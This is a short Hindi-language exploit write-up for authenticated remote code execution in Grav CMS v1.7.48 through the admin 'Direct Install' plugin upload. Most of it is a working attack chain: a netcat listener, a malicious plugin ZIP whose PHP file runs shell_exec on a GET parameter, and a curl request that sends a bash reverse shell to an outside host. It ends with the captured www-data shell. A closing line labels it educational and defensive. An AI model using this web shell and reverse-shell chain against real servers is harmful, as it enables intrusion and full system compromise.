
प्लगइन अपलोड के माध्यम से Grav CMS के लिए प्रमाणित RCE शोषण, मनमाना PHP कोड निष्पादन और रिवर्स शेल प्रदर्शित करता है।
Grav CMS v1.7.48 और Admin Plugin v1.10.48 'Direct Install' प्लगइन अपलोड सुविधा के माध्यम से रिमोट कोड एक्जीक्यूशन (RCE) के लिए संवेदनशील है, जो प्रमाणित प्रशासकों को सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देता है।
| प्रकार: | प्रमाणित रिमोट कोड एक्जीक्यूशन (RCE) |
| स्थान: | /admin/tools/direct-install (प्रशासक पैनल > उपकरण > डायरेक्ट इंस्टॉल) |
| प्रभाव: | मनमाना PHP कोड निष्पादन और संभावित पूर्ण सिस्टम समझौता |
| प्रमाणीकरण आवश्यक: | हाँ (प्रशासक पहुंच) |
| प्रभावित संस्करण: | Grav CMS v1.7.48 / Admin Plugin v1.10.48 |
एक लिसनर तैयार करें:
nc -lvnp 4444
एक प्रशासक के रूप में Grav प्रशासक पैनल में लॉग इन करें।
उपकरण > डायरेक्ट इंस्टॉल पर जाएं
एक दुर्भावनापूर्ण प्लगइन ZIP (evilplugin.zip) अपलोड करें, जो इस प्रकार संरचित हो:
evilplugin/
├── evilplugin.php ← शामिल है: shell_exec($_GET['cmd'])
└── blueprints.yaml ← सत्यापन पास करने के लिए न्यूनतम ब्लूप्रिंट
रिवर्स शेल ट्रिगर करें:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
रिवर्स शेल प्राप्त हुआ:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installकेवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए।